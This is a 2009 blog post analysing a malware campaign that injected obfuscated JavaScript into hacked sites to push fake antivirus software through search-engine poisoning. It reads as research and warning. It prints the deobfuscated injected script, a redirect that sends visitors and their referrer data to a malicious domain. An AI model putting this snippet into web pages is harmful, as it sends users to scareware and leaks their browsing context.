Saturday, March 28, 2009

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus

The World Wide Web Consortium and Rogue AV

Having your website hacked with IFRAME injected, trojans/backdoors?

Having your pages infected with redirection to rogue antivirus/antispyware?

Having your pages replaced with World Wide Web Consortium article and some
obfuscated javascript code append to them?


This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro)

Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page.

All info concluded that the attack was made via stolen FTP password, on all these domains.

An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated.

You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog.

The silent threat: Black Hat SEO and Rogue AV - 1
The silent threat: Black Hat SEO and Rogue AV - 2

*********************

Screenshot below show tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected.



Source of on of these site.





In a browser.



Deobfuscation results:

window.location = encodeURI(
"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" +
encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL) + "&default_keyword=XXX");

-----------------------

The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to onlinedetect.com or some domain used in this attack.
You can find information on this page.